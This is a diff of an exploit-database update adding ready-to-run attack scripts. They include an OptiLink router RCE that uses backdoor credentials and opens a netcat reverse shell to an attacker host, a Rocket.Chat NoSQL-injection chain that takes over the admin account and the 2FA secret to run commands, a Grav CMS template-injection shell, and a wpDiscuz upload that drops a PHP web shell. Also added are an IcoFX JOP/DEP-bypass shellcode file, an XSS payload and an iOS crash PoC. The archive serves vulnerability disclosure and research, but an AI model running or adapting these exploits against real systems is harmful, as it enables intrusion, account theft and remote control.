DB: 2021-06-08

11 changes to exploits/shellcodes

Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)

IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP

GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration
OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)
WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)
Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)
Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)
Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)

exploits/hardware/webapps/49955.py

@@ -0,0 +1,115 @@
+# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)
+# Date: 23/03/2021
+# Exploit Authors:  Developed by SecNigma and Amal.
+# Vendor Homepage:  https://optilinknetwork.com/
+# Version: ONT1GEW V2.1.11_X101 Build.1127.190306
+# Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above,
+# as they do not release the firmware to the public for some unknown reason.
+# Additional notes:			
+# Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306.
+# Device Name: ONT1GEW
+# Software Version:  V2.1.11_X101
+# Build Information: Build.1127.190306 
+# Chances are that XPONs of C-DATA company are affected too.
+# Our research indicated that Optilink devices are just a rebranded version of C-Data.
+# This exploit was tested on the following configuration.
+
+#!/usr/bin/python3
+
+import requests
+import argparse
+import re
+
+def is_login_success(r):
+	match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text)
+	if match:
+	    return match
+		
+# Default configuration
+# Router address   = 192.168.101.1
+# LPORT 		   = 9001
+# Default Username = e8c  / Backdoor     /
+# Default Password = e8c /  Credentials /
+
+parser= argparse.ArgumentParser()
+
+parser.add_argument("-t", "--target", dest = "target", default = "192.168.101.1", help="Target OptiLink Router IP")
+parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True)
+parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!")
+parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router")
+parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router")
+args = parser.parse_args()
+
+target=args.target,
+lhost=args.lhost,
+lport=args.lport,
+user=args.user,
+passw=args.passw
+
+# e8c:e8c are the backdoor administrator creds to Optilink devices
+# Alternate backdoor credentials are  adsl:realtek, admin:admin.
+user2="e8c"
+passw2="e8c"
+
+home_url="http://"+target[0]+"/boaform/admin/formLogin"
+
+print("[+] Trying to authenticate...")
+
+# Authenticate ourselves first
+data={'username':user, 'psd':passw}
+r=requests.post(home_url,data)
+
+res=is_login_success(r)
+if res:
+	print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"")
+	print("[-] Exploit failed with the following error:")
+	print(res)
+	print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?")
+	val = input("Press y or n : ")
+	if val[0].lower()=="y":
+		print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"")
+		
+		# Authenticate ourselves with new creds
+		data={'username':user2, 'psd':passw2}
+		r=requests.post(home_url,data)
+		res2=is_login_success(r)
+		
+		if res2:
+			print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"")
+			print("[-] Exploit failed with the following error:")
+			print(res2)
+			print("[-] Halting Execution.")
+			exit()
+	else:
+		print("Received input "+val+"")
+		print("[-] Halting Execution.")
+		exit()
+	
+print("[+] Looks like authentication was succesful!")
+print("[+] Trying to fetch the WAN Name...")
+
+# Fetching Wan Name
+# wan_name="1_INTERNET_R_VID_***"
+
+get_wan_url = "http://"+target[0]+"/diag_ping.asp"
+r=requests.get(get_wan_url)
+
+match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text)
+wan_name=match[0]
+
+
+print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..")
+print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*")
+print("[+] If everything went right, you should've gotten a shell right now!")
+
+# Starting Exploitation
+
+# The same vulnerability exists in formPing and formTracert.
+# exploit_url = "http://"+target[0]+"/boaform/admin/formPing"
+exploit_url = "http://"+target[0]+"/boaform/admin/formTracert"
+# Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :)
+# BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it.
+# The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload.
+# https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
+post_data='target_addr="1.1.1.1+`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"'
+r=requests.post(exploit_url,post_data)

exploits/ios/dos/49957.py

@@ -0,0 +1,35 @@
+# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010
+# Version: 1.4.2
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/linux/webapps/49960.py

@@ -0,0 +1,172 @@
+# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)
+# Author: enox
+# Date: 06-06-2021
+# Product: Rocket.Chat
+# Vendor: https://rocket.chat/
+# Vulnerable Version(s): Rocket.Chat 3.12.1
+# CVE: CVE-2021-22911
+# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat
+
+#!/usr/bin/python
+
+import requests
+import string
+import time
+import hashlib
+import json
+import oathtool
+import argparse
+
+parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE')
+parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True)
+parser.add_argument('-a', help='Administrator email', required=True)
+parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True)
+args = parser.parse_args()
+
+
+adminmail = args.a
+lowprivmail = args.u
+target = args.t
+
+
+def forgotpassword(email,url):
+	payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False)
+	print("[+] Password Reset Email Sent")
+
+
+def resettoken(url):
+	u = url+"/api/v1/method.callAnon/getPasswordPolicy"
+	headers={'content-type': 'application/json'}
+	token = ""
+
+	num = list(range(0,10))
+	string_ints = [str(int) for int in num]
+	characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints
+
+	while len(token)!= 43:
+		for c in characters:
+			payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c)
+			r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
+			time.sleep(0.5)
+			if 'Meteor.Error' not in r.text:
+				token += c
+				print(f"Got: {token}")
+
+	print(f"[+] Got token : {token}")
+	return token
+
+
+def changingpassword(url,token):
+	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
+	if "error" in r.text:
+		exit("[-] Wrong token")
+	print("[+] Password was changed !")
+
+
+def twofactor(url,email):
+	# Authenticating
+	sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
+	payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
+	if "error" in r.text:
+		exit("[-] Couldn't authenticate")
+	data = json.loads(r.text)  
+	data =(data['message'])
+	userid = data[32:49]
+	token = data[60:103]
+	print(f"[+] Succesfully authenticated as {email}")
+
+	# Getting 2fa code
+	cookies = {'rc_uid': userid,'rc_token': token}
+	headers={'X-User-Id': userid,'X-Auth-Token': token}
+	payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}'
+	r = requests.get(url+payload,cookies=cookies,headers=headers)
+	code = r.text[46:98]
+	print(f"Got the code for 2fa: {code}")
+	return code
+
+
+def changingadminpassword(url,token,code):
+	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}'
+	headers={'content-type': 'application/json'}
+	r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False)
+	if "403" in r.text:
+		exit("[-] Wrong token")
+
+	print("[+] Admin password changed !")
+
+
+def rce(url,code,cmd):
+	# Authenticating
+	sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest()
+	headers={'content-type': 'application/json'}
+	payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}'
+	r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False)
+	if "error" in r.text:
+		exit("[-] Couldn't authenticate")
+	data = json.loads(r.text)
+	data =(data['message'])
+	userid = data[32:49]
+	token = data[60:103]
+	print("[+] Succesfully authenticated as administrator")
+
+	# Creating Integration
+	payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}'
+	cookies = {'rc_uid': userid,'rc_token': token}
+	headers = {'X-User-Id': userid,'X-Auth-Token': token}
+	r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload)
+	data = r.text
+	data = data.split(',')
+	token = data[12]
+	token = token[9:57]
+	_id = data[18]
+	_id = _id[7:24]
+
+	# Triggering RCE
+	u = url + '/hooks/' + _id + '/' +token
+	r = requests.get(u)
+	print(r.text)
+
+############################################################
+
+
+# Getting Low Priv user
+print(f"[+] Resetting {lowprivmail} password")
+## Sending Reset Mail
+forgotpassword(lowprivmail,target)
+
+## Getting reset token
+token = resettoken(target)
+
+## Changing Password
+changingpassword(target,token)
+
+
+# Privilege Escalation to admin
+## Getting secret for 2fa
+secret = twofactor(target,lowprivmail)
+
+
+## Sending Reset mail
+print(f"[+] Resetting {adminmail} password")
+forgotpassword(adminmail,target)
+
+## Getting reset token
+token = resettoken(target)
+
+
+## Resetting Password
+code = oathtool.generate_otp(secret)
+changingadminpassword(target,token,code)
+
+## Authenticting and triggering rce
+
+while True:
+	cmd = input("CMD:> ")
+	code = oathtool.generate_otp(secret)
+	rce(target,code,cmd)

exploits/php/webapps/49958.txt

@@ -0,0 +1,21 @@
+# Exploit Title: WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)
+# Exploit Author: Hardik Solanki
+# Date: 05/06/2021
+# Software Link: https://wordpress.org/plugins/smart-slider-3/
+# Version: 3.5.0.8
+# Tested on Windows
+
+*How to reproduce vulnerability:*
+
+1. Install WordPress 5.7.2
+2. Install and activate the "*Smart Slider 3" Version 3.5.0.8* plugin
+3. Navigate to "*Dashboard* and create a "*New Project*".
+4. Enter the JavaScript payload "*<script>alert(document.cookie)</script>*" into the "*Name*" field.
+5. You will observe that the Project has been created with malicious
+JavaScript payload "<script>alert(document.cookie)</script>" and hence
+project has been* created/stored* and thus JavaScript payload is executing
+successfully.
+
+*XSS IMPACT:*
+1: Steal the cookie
+2: User redirection to a malicious website

exploits/php/webapps/49961.py

@@ -0,0 +1,81 @@
+# Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)
+# Author: enox
+# Date: 06-06-2021
+# Vendor: https://getgrav.org/
+# Software Link: https://getgrav.org/download/core/grav-admin/1.7.10
+# Vulnerable Version(s): Grav CMS 1.7.10
+# CVE: CVE-2021-29440
+# Credits: https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities
+# NOTES: You need a user who has access to /admin dashboard with page creation privileges.
+
+#!/usr/bin/python
+
+import requests
+from bs4 import BeautifulSoup
+import random
+import string
+
+
+username = 'username'
+password = 'password'
+url = 'http://grav.local'
+
+
+session = requests.Session()
+
+# Autheticating
+## Getting login-nonce
+def login(url,username,password):
+	r = session.get(url + "/admin")
+	soup = BeautifulSoup(r.text, features="lxml")
+	nonce = str(soup.findAll('input')[2])
+	nonce = nonce[47:79]
+
+	## Logging in
+	payload =f'data%5Busername%5D={username}&data%5Bpassword%5D={password}&task=login&login-nonce={nonce}'
+	headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+	r = session.post(url+"/admin",data=payload,headers=headers)
+
+
+# Creating Page for RCE
+
+def rce(url,cmd):
+	## Getting form nonce and unique form id
+	project_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 8))
+	r = session.get(url+f"/admin/pages/{project_name}/:add")
+	soup = BeautifulSoup(r.text, features="lxml")
+	nonce = str(soup.findAll('input')[72])
+	form_id = str(soup.findAll('input')[71])
+	form_id = form_id[54:86]
+	nonce = nonce[46:78]
+
+	## Creating Page
+	headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+	payload = f'task=save&data%5Bheader%5D%5Btitle%5D={project_name}&data%5Bcontent%5D=%7B%7B+system%28%27{cmd}%27%29+%7D%7D&data%5Bfolder%5D={project_name}&data%5Broute%5D=&data%5Bname%5D=default&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&toggleable_data%5Bheader%5D%5Bprocess%5D=on&data%5Bheader%5D%5Bprocess%5D%5Btwig%5D=1&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={form_id}&form-nonce={nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&data%5Bheader%5D%5Bprocess%5D%5Bmarkdown%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0'
+	r = session.post(url+f"/admin/pages/{project_name}/:add",data=payload,headers=headers)
+
+	## Getting command output
+	r = session.get(url+f"/{project_name.lower()}")
+	if 'SyntaxError' in r.text:
+		print("[-] Command error")
+	else:
+		a = r.text.split('<section id="body-wrapper" class="section">')
+		b = a[1].split('</section>')
+		print(b[0][58:])
+
+
+	# Cleaning up
+	## Getting admin-nonce
+	r = session.get(url + "/admin/pages")
+	soup = BeautifulSoup(r.text, features="lxml")
+	nonce = str(soup.findAll('input')[32])
+	nonce = nonce[47:79]
+
+	## Deleting Page
+	r = session.get(url+f"/admin/pages/{project_name.lower()}/task:delete/admin-nonce:{nonce}")
+
+login(url,username,password)
+
+while True:
+	cmd = input("$ ")
+	rce(url,cmd)

exploits/php/webapps/49962.sh

@@ -0,0 +1,42 @@
+# Exploit Title: Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)
+# Google Dork: inurl:/wp-content/plugins/wpdiscuz/
+# Date: 2021-06-06
+# Original Author: Chloe Chamberland 
+# Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0
+# Vendor Homepage: https://gvectors.com/
+# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip
+# Version: 7.0.4
+# Tested on: Ubuntu / WordPress 5.6.2
+# CVE : CVE-2020-24186
+
+#!/bin/bash
+
+if [ -z $1 ]
+then
+  echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n"
+  exit 0
+elif [ -z $2 ]
+then
+  echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n"
+  exit 0
+else
+
+post=$(curl -sI http://$1$2/ | head -n1)
+
+if [[ "$post" == *"200 OK"* ]]; then
+    wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/\nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3)
+    webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0awmuUploadFiles\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_nonce\"\x0d\x0a\x0d\x0a'$wmu_nonce$'\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmuAttachmentsData\"\x0d\x0a\x0d\x0aundefined\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"a.php\" Content-Type: image/jpeg\x0d\x0a\x0d\x0aGIF8\x0d\x0a<?php\x0d\x0aif(isset($_REQUEST[\'cmd\'])){\x0d\x0a        $cmd = ($_REQUEST[\'cmd\']);\x0d\x0a        system($cmd);\x0d\x0a        die;\x0d\x0a}\x0d\x0a?>\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"postId\"\x0d\x0a\x0d\x0a18\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s--\x0d\x0a' http://$1/wp-admin/admin-ajax.php | sed 's/\":"\http/\nhttp/g' | grep "http\:\\\\/" | cut -d '"' -f1 | sed 's/\\//g')
+
+    echo -e "\nWebshell:" $webshell"\n"
+    echo -e "--------------WIN--------------"
+    echo -e "        ¡Got  webshell!        "
+    echo -e "-------------------------------\n"
+    while :
+    do
+	read -p '$ ' command
+	curl -s $webshell?cmd=$command | grep -v GIF8
+done
+else
+    echo -e "\n[!] The indicated post was not found\n"
+fi
+fi

exploits/ruby/webapps/49821.sh

@@ -73,12 +73,12 @@ for (( i=0; i < $#; i++))
 
 
 ## checking the mandatory parameter (URL)
-if [ -z "$URL" ]  
-then 
+if [ -z "$URL" ]
+then
     usage
     echo ""
     echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}"
-    exit 0 
+    exit 0
 fi
 
 
@@ -100,12 +100,12 @@ do
 	 echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!"
 	 exit 0
 	fi
-	
+
 done < "$user_list"
 
 }
 
 
 
-# Main 
+# Main
 enumeration

exploits/windows/local/49959.py

@@ -0,0 +1,135 @@
+# Exploit Title: IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP
+# Date: 2020-05-20
+# Exploit Author: Austin Babcock
+# Vendor Homepage: https://icofx.ro/
+# Software Link: https://drive.google.com/file/d/1SONzNStA_W3pAPU5IUvsYS3z0jYymEZn/view?usp=sharing
+# Version: 2.6.0.0
+# Tested on: Windows 7 Ultimate x64
+# CVE: CVE-2013-4988
+# Steps: 1. Run script 2. Open application 3. Open maliciousJOP.ico via file -> open dropdown menu
+
+
+# Payload Length: 1626 bytes
+
+#While this is an older CVE, it is very rare to have a JOP chain available for a binary which is what this exploit attempts to demonstrate. 
+#Gadgets were found using the JOP ROCKET tool which is available at https://github.com/Bw3ll/JOP_ROCKET
+
+#This exploit utilizes ROP to set up a JOP chain that will perform multiple stack pivots and call VirtualProtect(). 
+#JOP utilizes a dispatcher gadget (#add ecx, dword ptr [eax] #jmp dword ptr [ecx]) to executes gadgets found within the dispatch table.
+#The ECX register will hold the address of the dispatch table, which will be modified each time the dispatcher gadget executes.
+#After each modification, ECX will point to the address of the next gadget in the JOP chain and "jmp dword ptr [ecx]" executes that gadget.
+#Each functional gadget must end in a jmp or call to a register containing the address of the dispatcher gadget.
+#In this exploit, ecx is used to hold the address of the dispatch table, and edi is used to hold the dispatcher gadget address.
+#The dispatch table is located just after the shellcode in this exploit's payload. The address is loaded into ECX using ROP to programatically generate the correct address..
+
+#!/usr/bin/python2
+import struct
+ 
+# Stuff we'll need for creating our malicious .ico
+header = "\x00\x00\x01\x00\x00\x6F"
+option = "\x02\x00\x00\x00"
+pad2 = "\x41"*8
+nseh = "\xfe\xff\xff\xff"
+
+base = 0x400000
+# SEH Overwrite with stack pivot - ADD ESP,0x800 # POP EBX # RET
+seh = struct.pack('<L', 0x0044f012)
+
+
+###########################
+
+#### LOAD DISPATCH TABLE ADDR INTO ECX ####
+#The dispatch table's address is calculated based off of the value of EBP, which is related to the paylaod's location in memory.
+jopSetup = struct.pack('<I',0x00580ca8) # POP ECX # RETN <- 
+jopSetup += struct.pack('<I',0x0000000) #clear ecx
+jopSetup += struct.pack('<I', base + 0x000e8643) # ADD ECX,EBP # RETN
+jopSetup += struct.pack('<I', base + 0x00007c03) # POP EAX # RETN
+jopSetup += struct.pack('<I',0x00009f0) # offset for disp table
+jopSetup += struct.pack('<I', base + 0x00007c63) # ADD ECX,EAX # RETN # ecx = disp table
+
+#### LOAD ADD VALUE PTR INTO EAX ####
+#Since the dispatcher gadget uses the instruction "add ecx, dword ptr[eax]" to modify the address of the dispatch table,
+#eax must point to a valid location in memory containing the value we want to add to ecx each time the dispatcher executes.
+#In this case, eax will point to an address containing the value 0x00000004.
+jopSetup += struct.pack('<I', base + 0x0029c000) # MOV EAX,ECX # POP ESI # RETN <-
+jopSetup += struct.pack('<I',0x0000000) # junk
+jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN
+jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN
+jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN
+jopSetup += struct.pack('<I', base + 0x0059d50d) # DEC EAX # RETN
+
+#### LOAD WRITABLE ADDR OFFSET INTO EBX #### 
+#The gadget used for stack pivoting has an extra instruction (or byte ptr [ebx - 0x781703bb]) that cannot be avoided. 
+#In order to ensure this instruction does not cause problems, ebx-0x781703bb must point to a writable section of memory so
+#that the instruction does not cause an access violation. This section makes sure ebx contains a compatible value.
+jopSetup += struct.pack('<I', base + 0x00390000) # POP EBX # RETN 
+jopSetup += struct.pack('<I', 0x78c0609a) # needed for stack pivot JOP gadget -- offset to writable addr
+
+#### LOAD DISPATCHER ADDR INTO EDI ####
+jopSetup += struct.pack('<I',base + 0x00051423) # POP EDI # RETN
+jopSetup += struct.pack('<I',base + 0x6d81) # disp gadget address 
+#Dispatcher:
+#add ecx, dword ptr [eax]   0x406d81 (offset 0x6d81)
+#jmp dword ptr [ecx]     
+
+#### BEGIN JOP -- PERFORM STACK PIVOT #### 
+jopSetup += struct.pack('<I', base + 0x1623) # JMP EDI
+table = struct.pack('<I',0x44444444) # padding
+#PIVOT 40 BYTES
+#Last POP will put VP ptr in EBP
+for i in range(10):
+  table += struct.pack('<I', 0x588b9b) #pop ebp # or byte ptr [ebx - 0x781703bb], cl # jmp edi <-
+
+#### CALL VirtualProtect() ####
+#The derferencing gadget used to call VirtualProtect() has an offset of -0x71 bytes from ebp.
+#To account for this, when the pointer for VirtualProtect() is loaded into ebp, 0x71 bytes are added to it in order
+#to ensure that ebp-0x71 is the correct value for the pointer. This can be seen below.
+table += struct.pack('<I',0x4c8eb7) #jmp dword ptr [ebp - 0x71] <-
+# VP ptr + offset for jmp ebp gadget
+vpPtr = struct.pack('<I',0x00bf6668 + 0x71) 
+
+############################################################################################
+
+
+msg_sc = ("\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B\x12\x80"
+          "\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20\x01\xC7\x31\xED"
+          "\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E\x08\x45\x78\x69\x74\x75"
+          "\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68"
+          "\x50\x21\x20\x01\x68\x78\x20\x4A\x4F\x68\x49\x63\x6F\x46\x89\xE1\xFE\x49\x0B\x31\xC0\x51"
+          "\x50\xFF\xD7")
+
+# ExitProcess(0);
+exit_sc = "\x31\xc0\x50\xb8\x00\x60\xbf\x00\xff\x10"
+
+
+addesp = "\x81\xec\x00\x10\x00\x00" # Stack pivot at start of shellcode
+shellcode = addesp + msg_sc + exit_sc
+nopwrap = "\x90"*(0x168 - len(shellcode)) + shellcode + "\x90"*0x20
+
+
+# padding until VP parameter location 
+paramPad = "C" *(36)
+
+paramPad += vpPtr
+
+### VIRTUAL PROTECT PARAMETERS ###
+vpParams = struct.pack('<I',0x18f744) #return addr
+vpParams += struct.pack('<I',0x18f744) #lpAddr
+vpParams += struct.pack('<I',0x500) #dwSize
+vpParams += struct.pack('<I',0x40) #flNewProt
+vpParams += struct.pack('<I',0x00bf4d0a) #lpfOldProtect
+
+
+# pad1 holds JOP Setup chain, VP() Parameters, Shellcode, Value for ADD, and Dispatch Table
+pad1 = "A"*580 + jopSetup + paramPad +  vpParams + nopwrap
+addVal = struct.pack('<I',0x00000004) # how much for disp gadget to add to Dispatch Table address
+pad1 += addVal
+pad1 += table # dispatch table
+pad1 += "B"*(0x640-len(pad1))
+
+# Piece together our exploit
+payload = header + pad1 + option + pad2 + nseh + seh
+# Write out our malicious file
+writeFile = open ("maliciousJOP.ico", "wb")
+writeFile.write( payload )
+writeFile.close()

files_exploits.csv

@@ -6793,6 +6793,7 @@ id,file,description,date,author,type,platform,port
 49952,exploits/ios/dos/49952.py,"Color Notes 1.4 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 49953,exploits/ios/dos/49953.py,"Macaron Notes great notebook 5.5 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
 49954,exploits/ios/dos/49954.py,"My Notes Safe 5.3 - Denial of Service (PoC)",2021-06-04,"Geovanni Ruiz",dos,ios,
+49957,exploits/ios/dos/49957.py,"Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)",2021-06-07,"Geovanni Ruiz",dos,ios,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
